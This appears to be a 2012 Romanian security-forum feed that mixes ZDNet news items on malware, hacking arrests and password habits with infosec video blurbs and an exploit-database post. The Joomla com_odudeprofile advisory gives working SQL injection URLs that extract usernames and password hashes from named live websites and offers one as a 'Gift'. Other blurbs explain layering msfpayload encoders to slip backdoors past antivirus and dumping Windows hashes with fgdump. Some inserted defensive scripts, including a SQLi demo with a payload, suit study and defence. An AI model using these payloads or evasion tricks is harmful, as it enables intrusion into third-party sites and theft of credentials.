# 1337day.com [2012-07-26]

Sursa: PHP UnZIP v0.1 - Full Disclosure | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
11. Singaporeans lack good online hygiene | ZDNet
Summary: Country's citizens tend not to change passwords or vary them for different online accounts, among other bad Web hygiene practices.
By Ellyne Phneah | July 26, 2012 -- 07:50 GMT (00:50 PDT)

Singaporeans are not doing enough to keep their online accounts safe, such as using unique passwords, changing passwords regularly, and using two-factor authentication (2FA), according to a survey by Assurity Trusted Solutions.

Released Thursday, the survey showed 60 percent of respondents who file their tax returns online and 59 percent who use other government services do not change their passwords. Some 45 percent of participants also do not have different passwords for all their online accounts, it said. Of those who use online banking services, 10 percent change their passwords quarterly as recommended, while 52 percent never change their passwords. As for online security traders, 9 percent change their passwords quarterly and 54 percent of them never do.

"Good cyber hygiene practices are generally lacking across the board," Chai Chin Loon, chief operating officer (COO) of Assurity, noted in a statement. The company is a wholly-owned subsidiary set up by Singapore's IT regulator, the Infocomm Development Authority of Singapore (IDA), to oversee the running of the National Authentication Framework (NAF). Its survey polled 346 Singaporeans during a roadshow between Apr. 2 and Apr. 4 this year.

Make 2FA a way of life

The survey also showed 68 percent of respondents indicating that someone hacking into their financial information is their topmost concern when performing an online transaction. This was followed by identity theft at 45 percent, and private information being made public at 44 percent. These concerns could be why 74 percent of those polled acknowledged 2FA to be an important element of an ideal security process for users, it added.

Chai said: "Clearly the failure to activate 2FA is not due to a lack of awareness. End users should activate 2FA whenever possible to strengthen their online security." He added that consumers who conduct online banking are already more vigilant against cybercrime than other consumer demographics. However, the COO stressed that educating users to make 2FA a way of life for sensitive online transactions such as e-mail, social networking, accessing online health records, and financial information should continue to be a priority.

Last week, IDA revealed plans for an open tender to attract more operators to provide 2FA services for public sector agencies, which is part of its wider strategy to drive 2FA adoption in the country.

Sursa: Singaporeans lack good online hygiene | ZDNet
12. BackTrack 5 - MSFPayload'da Birden Fazla Encoder Kullanmak (Using Multiple Encoders in MSFPayload)
Description: In this video you will learn how to create a backdoor using a multi-encoder msfpayload backdoor. Previously we encoded a backdoor using only one encoder; in this video you will see how to encode your backdoor using three encoders or more. I think this makes it hard for AVs to detect; if it is still detected by AVs, use a hex editor and change some values, as you have done before. This is a pretty good new trick; try it.

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source: BackTrack 5 - MSFPayload'da Birden Fazla Encoder Kullanmak on Vimeo
13. Description: In this video you will learn how to crack Windows passwords using the command prompt in Windows. First you need to download a tool called FGDUMP and follow the video; after using this tool you will receive all users' hashes. This is a good trick, as you don't need to use some live CD or something else.

FGDUMP: FGDUMP is a very easy to use Windows-based hash cracker tool. But you can use this tool only in the Windows command prompt. Here I have posted some uses of that tool.

fgdump [-?][-t][-c][-w][-s][-r][-v][-k][-o][-a][-l logfile][-T threads] [{{-h Host | -f filename} -u Username -p Password | -H filename}]
where Username and Password have administrator credentials
-? displays help (you're looking at it!)
-t will test for the presence of antivirus without actually running the password dumps
-c skips the cache dump
-w skips the password dump
-s performs the protected storage dump
-r forgets about existing pwdump/cachedump files. The default behavior is to skip a host if these files already exist.
-v makes output more verbose. Use twice for greater effect
-k keeps the pwdump/cachedump going even if antivirus is in an unknown state
-l logs all output to logfile
-T runs fgdump with the specified number of parallel threads
-h is the name of the single host to perform the dumps against
-f reads hosts from a line-separated file
-H reads host:username:password from a line-separated file (per-host credentials)
-o skips pwdump history dumps
-a will not attempt to detect or stop antivirus, even if it is present

Foofus.Net Security Stuff - Foofus.Net Advanced Security Services Forum

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
14. Description: The r00tw0rm Team released a new tool today, called "Sensitive Buster", coded by Th3breacher and Angel Injection. The tool finds vulnerabilities on web servers, admin panels, sensitive files and folders, and even backups. The tool is coded in Python and is open source, so everyone can edit it. Visit: [in]Seguridad Informática

Disclaimer: We are an infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be the same without verifying.
Original Source:
15. China's Web policing nets 600 criminal gangs | ZDNet
Summary: Country's efforts to clamp down on Web-related criminal activities have resulted in more than 10,000 suspects arrested and 30 ISPs censured for allowing access to unlicensed Web sites so far.
By Ellyne Phneah | July 26, 2012 -- 04:45 GMT (21:45 PDT)

Chinese authorities have busted more than 600 criminal gangs for Internet-related crimes since a campaign was launched in March. According to a statement released Wednesday by the country's Ministry of Public Security, the campaign had "achieved remarkable results" with more than 10,000 suspects arrested and 3.2 million "harmful" online messages deleted. Some 62 Web sites and online forums have been told to remove inappropriate content, while 30 Internet service providers (ISPs) were punished for granting network access to unlicensed Web sites, it added.

Major crimes uncovered during the crackdown include the spreading of pornography, gun trading, counterfeiting of certificates, and illegally collecting and selling citizens' information, the statement noted. The ongoing campaign also saw the Chinese police in Jieyang take down a group of hackers allegedly responsible for breaching 185 government sites on Thursday. They were said to be part of a network of certificate forgers and personal data collectors selling fake certificates.

Combating cybercrime is a "long and arduous task", the ministry stated, but it will continue to increase efforts to "maintain public order, protect the legitimate rights and interest of the masses, and promote healthy and orderly development of the Internet".

Sursa: China's Web policing nets 600 criminal gangs | ZDNet
16. China cracks hacking syndicate | ZDNet
Summary: Local police take down a group of hackers allegedly responsible for breaching 185 government Web sites, who are part of a network of certificate forgers and personal data collectors selling fake certificates.
By Jamie Yap | July 26, 2012 -- 02:48 GMT (19:48 PDT)

Chinese police have detained a gang of hackers, certificate forgers, and personal data collectors, believed to be responsible for attacks on 185 government Web sites to manufacture and sell fake certificates ranging from medical care to financial services. China Daily reported on Thursday the suspects allegedly hacked into sites managed by authorities in 30 provinces, municipalities and autonomous regions.

Chen Xiaoping, head of Jieyang police's cybercrime unit, said the group tampered with official databases such that if anyone looked up a particular person's certificate details, it would reflect the hacker group's client instead of the original owner. This caused "great damage to the image of the government", added Xie Yaoqi, director of the public security bureau in Jieyang, in the report.

China Daily reported the crackdown began when the city's office of personnel and examinations reported an attack on its site on Dec. 8, 2011, after finding a link had been illegally added. This led police to seven suspects who sold fake certificates in Nanjing, Jiangsu province and Heyuan in Guangdong, and subsequently to the discovery of a network of hackers, certificate forgers, advertisers, and personal data collectors scattered across at least 12 provinces in China. As of Jul. 12, police have arrested 165 people, confiscated more than 7,100 fake certificates and at least 10,000 fake seals, and are still searching for more syndicate members, the report added.

Chen said 14 principal suspects from the gang were under the age of 30, with the youngest aged 18. "They have a strong idea on how not to get caught," he said. "They used overseas servers and bank accounts of strangers, whose details were bought online." He noted that hackers attacked government sites to show off their skills in the past, but now do so to make money.

The fake certificates were sold for between 4,000 yuan (US$632) and 10,000 yuan (US$1,580), and generated profits of more than 300 million yuan (US$47,409), the article stated. The large-scale hacking of government sites has exposed a huge market for fake certificates in China, it added. Jieyang police claimed more than 30,000 people bought fake qualifications made by the gang, including in medical care, financial services, and architecture.

Xu Jianzhuo, from the Ministry of Public Security's network security bureau, called for stricter supervision in addition to police intervention to tackle cybercrime, including laws and regulations to strengthen the obligations of Internet service providers (ISPs) to verify users' information. Collecting evidence for cybercrimes is difficult and the real-name registration rule has not been genuinely put into practice, so users can still register with a fake name and ID number which would not be verified by the online service provider, he added.

Sursa: China cracks hacking syndicate | ZDNet
17. Iran nuclear facilities struck down by midnight 'thunder' | ZDNet
Summary: Iran's nuclear program has been subject to another attack, with several workstations in two facilities blasting AC/DC's "Thunderstruck" in the middle of the night.
By AAP and Michael Lee | July 26, 2012 -- 02:22 GMT (19:22 PDT)

Iran's nuclear program has been hit by a cyber virus that has shut down key computerised functions at two facilities and played music by the rock band AC/DC at loud volumes, according to a report on internet security website F-Secure. The website earlier this week said that it was informed of the cyber attack by a scientist working at the Atomic Energy Organisation of Iran (AEOI), who sent F-Secure an email detailing the breach. F-Secure had confirmed the email came from within AEOI.

The email said: "Our nuclear program has once again been compromised and attacked by a new worm ... The automation network and Siemens hardware were attacked and shut down. I only know very little about these cyber issues as I am [a] scientist, not a computer expert. There was also some music playing randomly on several of the workstations during the middle of the night, with the volume maxed out. I believe it was playing 'Thunderstruck' by AC/DC."

The two facilities in question are the Natanz facility, which was the target of the Stuxnet attack, and a facility located near Qom, Iran. Iran's cyber security experts working on the issue wrote to scientists, stating that they believe the attacker had access to the facilities' VPN and had used the popular open-source exploitation framework Metasploit to gain access to its systems. Metasploit itself enables computers to be scanned, mostly autonomously, for known vulnerabilities, making it an easy way for attackers to infiltrate systems without necessarily understanding how the exploit works.

Iran's nuclear program has been a frequent target of cyber attacks, which the country's leaders have blamed on Israel and the United States.
Sursa: Iran nuclear facilities struck down by midnight 'thunder' | ZDNet
18. This Xbox HDMI cable has 'anti-virus protection' | ZDNet
Summary: No, I'm not late for April Fools' Day. This is simply just false advertising at its best (or worst, depending on your point of view).
By Emil Protalinski for Zero Day | July 25, 2012 -- 23:00 GMT (16:00 PDT)

Sometimes, you just can't make this stuff up. I mean, if you tried really, really hard, you wouldn't come up with anything like it. This "superior quality HDMI LX Cable" not only offers you "an exceptional image, whether you are playing a game or watching your favourite DVD" but it also has "anti-virus protection." Seriously, that's what the feature list on the packaging claims. As you can see in the image above, courtesy of Gizmodo, the cable features "'100% Mylar' double shield 1.3c grade cable with anti-virus protection to reduce virus noises and to obtain perfect image transmission."

Here's the kicker, in case you were too astounded that you missed it. The cable doesn't claim to feature virus protection. No. It features anti-virus protection. Virus protection protects you from viruses. So anti-virus protection must protect you from anti-viruses? I'm having some trouble stopping my head from shaking.

Gizmodo asks if there are any people in this world "so stupidly stupid as to believe that a virus may attack your video cables and cause noise." Readers in the comments section have responded with a resounding yes, unfortunately.

This company should be sued into oblivion. Actually, Microsoft should sue this company into oblivion. After all, it's apparently called the "Xbox 360 Elite HDMI cable." I'm pretty sure Redmond wouldn't be too pleased to know its brand is being used in this way. In fact, I've made a point to contact the software giant about this little tidbit. I'll update you if and when I hear back.

Sursa: This Xbox HDMI cable has 'anti-virus protection' | ZDNet
19. Romanians have a proverb, "Ai carte, ai parte." ("If you have learning, you have your share."). That is how it is in life too: if you have learning, you get a well-paid job, a job where you can do what you like. On the other hand, when you have no learning, things get a bit "nasty": when you can't string two words together, you end up either as a labourer on a building site or picking mulberries in Spain. By the way, did you know that at first the "carte" in this proverb referred to the land register (cartea funciară)? Long before our time, the land register symbolised ownership of a property. Some time after that, through association with learning, it took on a new meaning, that of the benefit of education.
  20. Warning: New Android malware tricks users with real Opera Mini | ZDNet Summary: Cybercriminals have created a new variant of the OpFake malware for Android that comes bundled with a legitimate version of the Opera Mini mobile browser. This helps trick users into thinking that nothing is wrong as they can simply use the real software as expected. By Emil Protalinski for Zero Day | July 25, 2012 -- 18:25 GMT (11:25 PDT) A new piece of malware is trying to take advantage of Opera's popularity as a mobile browser alternative on Android smartphones. Cybercriminals have created a new variant of Opfake that bundles the real Opera Mini version 6.5 so as to further mask what the malware is actually doing (earning its creators money from unsuspecting users by sending international text messages). GFI, which first discovered the malware, is calling this particular threat Trojan.AndroidOS.Generic.A. The package is named "com.surprise.me" while the file name is "opera_mini_65.apk" (both can easily be changed). As you can see above, two sets of "Permission to Install" pages are displayed during installation. The first (above in the middle), comes from the malware itself: it asks for read and modify rights to all SMS and MMS messages, read rights to all contacts stored on the smartphone, modify or delete rights to the SD card, and so on. The second (above on the right) one appears once users agree to install the first, which is simply the permissions required for the legitimate Opera Mini browser. This particular threat is interesting because it shows that OpFake is evolving. Instead of trying to mimic a popular app, OpFake now simply installs the real version. As a result, the user is less suspicious that something is wrong. "More than likely, users will not be aware that something might have infiltrated their phones until the bill arrives," a GFI spokesperson said in a statement. 
The devil is in the details: in the background, the malicious app sends expensive international text messages to earn its creators revenue. The malicious app does the dirty work to incur costs on the victim. More specifically, here's what this particular threat does:
- It sends one SMS message to a premium-rate number before it installs the legitimate Opera Mini. A command and control (C&C) server controls the message sent and the number where it is sent.
- It also connects to the C&C server to retrieve data.
- It reads the following stored information: Country location, Operator name, OS version, Phone type, and Device ID (IMEI).

Android lets you download and install apps from anywhere. If you want the official version of an app, however, get it from the official Google Play store. Here is the official Opera Mini link: play.google.com/store/apps/details?id=com.opera.mini.android.

Sursa: Warning: New Android malware tricks users with real Opera Mini | ZDNet
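The tell in the article above is the first permission prompt: a browser that wants to read and modify SMS, read contacts and write to the SD card. The script below is an added example for this page, not GFI's analysis or any Opera code, that turns that observation into a triage check over an app's manifest. The two manifests are constructed (the package name com.surprise.me is the one the article quotes; com.example.browser is made up), the risk thresholds are this example's own heuristic, and real APKs carry a binary-encoded manifest that has to be decoded first (apktool, androguard) before it can be parsed as XML like this.

```python
# Added example: flag the SMS/contacts permission combination described above.
# Manifests are constructed; the grouping and risk levels are this example's
# own heuristic, not an Android or GFI classification.
import xml.etree.ElementTree as ET
from typing import Dict, List, Set

ANDROID_NS = "{http://schemas.android.com/apk/res/android}"

# Real Android permission names, grouped by what the described malware does.
SEND_SMS = "android.permission.SEND_SMS"
SMS_ACCESS = {"android.permission.READ_SMS", "android.permission.RECEIVE_SMS",
              "android.permission.WRITE_SMS"}
CONTACTS = {"android.permission.READ_CONTACTS"}
DEVICE_PROFILE = {"android.permission.READ_PHONE_STATE"}   # IMEI, operator
STORAGE = {"android.permission.WRITE_EXTERNAL_STORAGE"}


def requested_permissions(manifest_xml: str) -> Set[str]:
    """Collect every <uses-permission android:name=...> in a decoded manifest."""
    root = ET.fromstring(manifest_xml)
    return {el.get(ANDROID_NS + "name", "") for el in root.iter("uses-permission")}


def assess(manifest_xml: str) -> Dict[str, object]:
    """Return package name, human-readable findings and a coarse risk level."""
    root = ET.fromstring(manifest_xml)
    perms = requested_permissions(manifest_xml)
    findings: List[str] = []
    if SEND_SMS in perms:
        findings.append("can send SMS: premium-rate fraud possible")
    if perms & SMS_ACCESS:
        findings.append("can read/modify SMS: carrier replies can be hidden")
    if perms & CONTACTS:
        findings.append("reads contacts")
    if perms & DEVICE_PROFILE:
        findings.append("reads IMEI/operator (device fingerprinting)")
    if perms & STORAGE:
        findings.append("modifies SD card contents")
    # Sending SMS plus reading/intercepting SMS is the classic toll-fraud pair
    # (send the premium message, then hide the carrier's reply), so that
    # combination alone is rated high regardless of the rest.
    if SEND_SMS in perms and perms & SMS_ACCESS:
        risk = "high"
    elif findings:
        risk = "medium"
    else:
        risk = "low"
    return {"package": root.get("package"), "findings": findings, "risk": risk}


# Constructed manifests: the first mimics the trojanised package, the second
# is what a plain browser would need.
TROJAN_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.surprise.me">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.SEND_SMS"/>
  <uses-permission android:name="android.permission.RECEIVE_SMS"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <uses-permission android:name="android.permission.WRITE_SMS"/>
  <uses-permission android:name="android.permission.READ_CONTACTS"/>
  <uses-permission android:name="android.permission.READ_PHONE_STATE"/>
  <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>
</manifest>"""

BROWSER_MANIFEST = """<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.browser">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>
</manifest>"""

if __name__ == "__main__":
    for manifest in (TROJAN_MANIFEST, BROWSER_MANIFEST):
        print(assess(manifest))
```

The point of the grouping is that no single permission is damning (a messaging app legitimately sends SMS); it is the pairing of SEND_SMS with SMS read/receive rights in an app whose stated purpose is browsing that should stop the install.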
21. iOS app developer: Android is designed for piracy | ZDNet
Summary: An iOS app developer argues Apple's App Store is superior to the Google Play store, and he's not the first to say so. Fragmentation aside, he argues that "closed" is better than "open" because piracy isn't a serious problem, and at the end of the day, most app developers need to make money.
By Emil Protalinski for Zero Day | July 25, 2012 -- 16:37 GMT (09:37 PDT)

Following Madfinger Games' decision to relaunch one of its Android games as a free app due to an "unbelievably high" piracy rate, iOS and Mac app developer Matt Gemmell has weighed in on the situation. He has written a lengthy post titled Closed for Business in which he explains why Android app creators are having so much trouble making money. The article's subheadings pretty much summarize the piece: Designed for piracy, A broken business model, and Freedom from choice. Here are three quotes, one from each section, that I found particularly worthy of highlighting:

"The system is designed for piracy from the ground up. The existence of piracy isn't a surprise, but rather an inevitability."

"Piracy isn't a symptom of social disease. Piracy is a symptom of failure to find an effective business model."

"Open is broken as a money-making platform model, unless you're making the OS or the handsets. Most of us aren't doing that."

Gemmell makes excellent points throughout his piece and I strongly recommend reading the whole thing. Many will be quick to point out that he's an iOS app developer, so his conclusion under the last heading "Lock it down" should not be surprising: "Closed is better for business." The problem is that he's right. There's absolutely no denying that (most) app developers make more money on iOS and that the App Store is much more profitable for Apple than the Google Play store is for Google.

That being said, however, I don't believe that "closed" is the solution. Gemmell clearly outlines why one is better than the other for app developers, and I do think Google needs to bring some of the App Store's features to the Google Play store, but I also believe Apple should do the same, and vice versa. There is a middle ground between open and closed, between unlocked and locked, between free and paid. I just don't think we've found it yet, and likely won't for quite a while longer. After all, app stores are still relatively new as a concept as well as a business model.

Sursa: iOS app developer: Android is designed for piracy | ZDNet
22. Researchers claim FinFisher scalp with RAT analysis | ZDNet
Summary: Researchers believe they have analysed FinSpy, part of the FinFisher cyber-espionage suite, which was sent to Bahraini activists this year.
By Tom Espiner | July 25, 2012 -- 16:34 GMT (09:34 PDT)

Researchers believe they have analysed part of FinFisher, a commercially-available cyber-espionage suite, for the first time. Having analysed several pieces of malware sent to Bahraini pro-democracy activists and obtained by Bloomberg News, researchers from the University of Toronto Munk School of Global Affairs' Citizen Lab believe they have identified one part of the suite made by Gamma International.

FinSpy, FinFisher's Remote Access Tool (RAT), is designed to intercept encrypted communications, according to documents on WikiLeaks. The RAT has the capability of allowing an attacker to monitor encrypted communications such as Skype calls, according to Citizen Lab. The RAT attempted to infect the Bahraini activists' machines using social engineering, said the researchers.

"In early May, we were alerted that Bahraini activists were targeted with apparently malicious e-mails," a Munk researcher said in a blog post on Wednesday. "The emails ostensibly pertained to the ongoing turmoil in Bahrain, and encouraged recipients to open a series of suspicious attachments."

The emails sent to activists typically featured infected .rar compression files, which contained executables masquerading as picture files or documents. Once executed, the files installed a multi-featured Trojan which used "a myriad of techniques" to try to evade detection. For example, a virtualised, bespoke packer converted native x86 instructions from the malware into another custom language chosen from one of 11 code templates. These instructions were then interpreted by an obfuscated interpreter customised for that particular language. The malware also looks for antivirus software, and appears to be able to evade some antivirus on a version-by-version basis, said the researchers.

The RAT collects a wide range of data from an infected victim, including screenshots, keylogger data, audio from Skype calls, and passwords, said Citizen Lab. Data such as Skype chat messages and audio from all participants in a call are extracted, encrypted using AES, and sent to the party that launched it.

Samples of the Trojan have been extremely hard to come by, according to F-Secure chief research officer Mikko Hypponen. "To analyse this sample in detail is groundbreaking," Hypponen told ZDNet on Wednesday. "We've seen sales pitches, but we haven't seen a sample before." Hypponen said that F-Secure would now ask for a sample of the Trojan, and build it into its anti-malware.

Sursa: Researchers claim FinFisher scalp with RAT analysis | ZDNet
23. Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode

Exploit Title: Joomla com_odudeprofile V2.x Exploit
Google Dork: inurl:index.php?option=com_odudeprofile
Date: [24-07-2012]
Author: Daniel Barragan "D4NB4R"
Twitter: @D4NB4R
Site: Poison Security (http://poisonsecurity.wordpress.com/)
Vendor: ODude Network (http://www.odude.com)
Version: 2.7 & 2.8
Download: ODude Profile 2.8 (http://www.odude.com/home/profile.html)
License: Non-Commercial
Tested on: [Linux(arch)-Windows(7ultimate)]
______________________________________________________________________________________

Test:
http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=idtrue%27

Sql:
http://127.0.0.1/index.php?option=com_odudeprofile&view=search&profession=(SQL)

demo1:
http://genteagro.com/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28username,0x3D,password%29%20from%20jos_users%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R

demo2:
http://www.eveproducciones.com.mx/perfil/index.php?option=com_odudeprofile&view=search&profession=999999.9%27%20union%20all%20select%200x31303235343830303536%2C%28select%20concat%28jos_users.username,0x3D,jos_users.password%29%20from%20%60eveprodu_joomesp%60.jos_users%20Order%20by%20username%20limit%200,1%29%20%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20d4nb4r

demo3:
http://www.urbansky.co.za/index.php?option=com_odudeprofile&view=search&profession=999999.9.9%27%20union%20all%20select%200x31303235343830303536%2Cconcat%28unhex%28Hex%28cast%28database%28%29%20as%20char%29%29%29%29%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536--%20D4NB4R

Gift: http://www.eveproducciones.com.mx/perfil/

I'm not responsible for the use that is made of this.
(No me hago responsable del uso que se le de)
_______________________________________________________________________________________
Daniel Barragan "D4NB4R"
# 1337day.com [2012-07-25]

Sursa: Joomla Component com_odudeprofile SQL Injection Vulnerability | Inj3ct0r - exploit database : vulnerability : 0day : shellcode
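The demo URLs above are a textbook UNION-based injection: the profession parameter closes the string literal, appends a SELECT with as many columns as the component's own query (27 filler values plus the username=password concatenation), and comments out the trailing quote. What follows is an added example written for this page, not the component's code or the advisory's, that reproduces the vulnerable pattern and its fix against an in-memory SQLite database so it runs offline. The profiles table, its rows and the password hash are constructed; jos_users is the Joomla table the advisory targets; and the payload is adapted to SQLite (|| instead of MySQL's concat(), two columns instead of 28).

```python
# Added example: string-built query vs. parameterised query for the injection
# class the advisory reports.  Schema rows and hashes are constructed; the
# payload is a SQLite adaptation of the advisory's MySQL one.
import sqlite3
from typing import List, Tuple


def setup_db() -> sqlite3.Connection:
    """Constructed data: one Joomla-style user row and two profile rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE jos_users (username TEXT, password TEXT);
        CREATE TABLE profiles  (name TEXT, profession TEXT);
        INSERT INTO jos_users VALUES ('admin', '21232f297a57a5a743894a0e4a801fc3:Xy7Q');
        INSERT INTO profiles  VALUES ('alice', 'developer');
        INSERT INTO profiles  VALUES ('bob',   'designer');
    """)
    return conn


def search_vulnerable(conn: sqlite3.Connection, profession: str) -> List[Tuple]:
    """String-built query: the 'profession' value closes the quote and appends
    a UNION, the same pattern the advisory's demo URLs exploit."""
    sql = f"SELECT name, profession FROM profiles WHERE profession = '{profession}'"
    return conn.execute(sql).fetchall()


def search_safe(conn: sqlite3.Connection, profession: str) -> List[Tuple]:
    """Parameterised query: the identical input is bound as data and never
    parsed as SQL, so the UNION is just a profession nobody has."""
    sql = "SELECT name, profession FROM profiles WHERE profession = ?"
    return conn.execute(sql, (profession,)).fetchall()


# Closing quote, UNION with the same column count as the original SELECT,
# then a comment to swallow the trailing quote the application appends.
PAYLOAD = "999999.9' UNION ALL SELECT username || '=' || password, 'x' FROM jos_users-- "

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", search_vulnerable(db, PAYLOAD))
    print("safe:      ", search_safe(db, PAYLOAD))
```

The column count matters because a UNION with the wrong number of columns is a syntax error; that is why the advisory's payloads pad with 27 copies of the same hex literal, found by trial until the error disappeared. Binding the parameter removes the whole class, no matter how many columns the query has.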
  24. Apple removes Windows malware from iOS App Store | ZDNet Summary: Malware hit the iOS App Store. Don't worry though: it won't harm your iPhone, iPad, or Mac (your Windows computer is a different story, but even that is a long shot), and Apple has already removed it. On Tuesday, an iOS app in the App Store was discovered containing malicious Windows executable files. While this meant your iPad, iPhone, iPod touch, and Mac could not be infected, even Windows users were relatively safe since the malware had to be manually extracted from the iOS application package. Either way, Apple quickly removed it. iOS user "deesto" posted the following message in the Apple Support Communities forum in a post titled "apps reported as virus" (via CNET): In short, the app called "Instaquotes-Quotes Cards For Instagram" was being flagged by the user's antivirus as a worm. While some argued this was a false positive, it was quickly confirmed the iOS package included a threat identified as Worm.VB-900 by ClamAV and Worm:Win32/VB.CB by Microsoft. The app in question had been in the App Store since July 19. Over the weekend, its price was temporarily slashed from $0.99 to free. It is unknown how many users downloaded the infected app while it was available, and Apple is unlikely to share such information. Within hours of the report, Apple removed the app from the App Store. The developer "Appsstand" then posted the following message in the same forum topic: It's not entirely clear whether the malware's inclusion inside the app was done on purpose. Given that it wasn't exactly set up to infect a computer upon download, it's most likely this was an accidental inclusion due to the developer's computer being infected. Apple needs to start scanning for Windows malware as well as Mac and iOS malware when developers upload their apps to the company's app repository.
A simple extraction and scanning of all the files from the iOS app package would have prevented this threat from getting onto the iOS App Store. Source: Apple removes Windows malware from iOS App Store | ZDNet
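The article's closing point is that an .ipa is just a zip archive, and that unpacking it and checking each member would have caught the stowaway Windows binary. The script below is an added illustration of that check; it is not code from ZDNet, Apple or the app's developer, and the package it scans is constructed inline (the file names and contents are made up for the example). It looks past file extensions and identifies Windows PE images by their DOS "MZ" header and the "PE\0\0" signature that the e_lfanew field points at, so a binary renamed to icon.png is still flagged; members that merely carry a Windows executable extension are reported separately.

```python
import io
import struct
import zipfile

# Constructed sample only: the app bundle, file names and contents below are
# made up for this example and are not the package discussed in the article.

PE_SIGNATURE = b"PE\0\0"
WINDOWS_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".pif")


def is_pe_executable(data: bytes) -> bool:
    """True if data starts with a DOS 'MZ' header whose e_lfanew points at 'PE\\0\\0'.

    Checking the header rather than the file name catches a Windows binary
    that was stored under a harmless-looking name such as icon.png.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)  # offset of the PE header
    if e_lfanew + 4 > len(data):
        return False
    return data[e_lfanew:e_lfanew + 4] == PE_SIGNATURE


def scan_package(ipa_bytes: bytes) -> list[tuple[str, str]]:
    """Walk every member of an .ipa (a plain zip) and report Windows executables.

    Returns (member name, reason) pairs in archive order, where reason is
    'pe-header' for a real PE image or 'windows-extension' for a member that
    only carries a Windows executable extension.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)  # app package members are small enough to read whole
            if is_pe_executable(data):
                findings.append((info.filename, "pe-header"))
            elif info.filename.lower().endswith(WINDOWS_EXTENSIONS):
                findings.append((info.filename, "windows-extension"))
    return findings


def _fake_pe_image() -> bytes:
    """Constructed, non-runnable bytes with a valid MZ header and a PE signature at 0x80."""
    dos_header = bytearray(0x40)
    dos_header[:2] = b"MZ"
    struct.pack_into("<I", dos_header, 0x3C, 0x80)  # e_lfanew -> 0x80
    return bytes(dos_header) + b"\0" * 0x40 + PE_SIGNATURE + b"\0" * 20


def build_sample_ipa() -> bytes:
    """Constructed .ipa: a normal-looking app bundle with one stowaway Windows binary."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("Payload/Sample.app/Info.plist", '<plist version="1.0"></plist>')
        zf.writestr("Payload/Sample.app/Sample", b"\xcf\xfa\xed\xfe" + b"\0" * 60)  # Mach-O 64-bit magic
        zf.writestr("Payload/Sample.app/image.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 16)
        zf.writestr("Payload/Sample.app/icon.png", _fake_pe_image())  # PE hidden under a .png name
        zf.writestr("Payload/Sample.app/notes.dat", b"MZ" + b"\0" * 10)  # too short to be a PE
        zf.writestr("Payload/Sample.app/helper.dll", b"just text, not a binary")  # suspicious name only
    return buf.getvalue()


if __name__ == "__main__":
    for name, reason in scan_package(build_sample_ipa()):
        print(f"{reason:18} {name}")
```

In a real submission pipeline this header check would sit in front of a proper engine such as the ClamAV scan the article mentions; the point of the header test is that it does not depend on the file name, which is exactly what a renamed or accidentally bundled binary defeats.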
